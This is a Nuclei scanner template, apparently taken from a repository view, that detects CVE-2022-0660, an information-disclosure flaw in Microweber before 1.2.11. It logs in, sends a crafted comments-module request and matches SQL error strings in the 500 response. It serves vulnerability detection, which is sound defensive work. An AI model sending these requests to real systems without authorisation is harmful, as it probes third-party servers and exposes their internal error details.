nuclei-templates/http/cves/2022/CVE-2022-0660.yaml

56 lines
2.0 KiB
YAML
Raw Normal View History

2022-08-03 10:54:02 +00:00
id: CVE-2022-0660
info:
name: Microweber <1.2.11 - Information Disclosure
2022-08-04 11:19:27 +00:00
author: amit-jd
2022-08-03 10:54:02 +00:00
severity: high
2022-08-03 13:50:49 +00:00
description: |
Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-08-03 10:54:02 +00:00
reference:
- https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/
- https://github.com/advisories/GHSA-hhrj-wp42-32v3
- https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291
- https://nvd.nist.gov/vuln/detail/CVE-2022-0660
2022-08-03 10:54:02 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-0660
2022-08-03 10:54:02 +00:00
cwe-id: CWE-209
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
epss-score: 0.0053
2022-08-03 13:50:49 +00:00
metadata:
max-request: 2
verified: "true"
tags: cve2022,microweber,disclosure,authenticated,huntr,cve
2022-08-03 10:54:02 +00:00
http:
2022-08-03 10:54:02 +00:00
- raw:
- |
POST /api/user_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
2022-08-03 13:50:49 +00:00
2022-08-03 10:54:02 +00:00
- |
POST /module/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}admin/view:comments
class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}
req-condition: true
cookie-reuse: true
matchers:
- type: dsl
dsl:
- contains(body_2,'QueryException')
- contains(body_2,'SQLSTATE')
- contains(body_2,'runQueryCallback')
- 'contains(all_headers_2,"text/html")'
- 'status_code_2==500'
2022-08-03 13:50:49 +00:00
condition: and
# Enhanced by md on 2023/04/06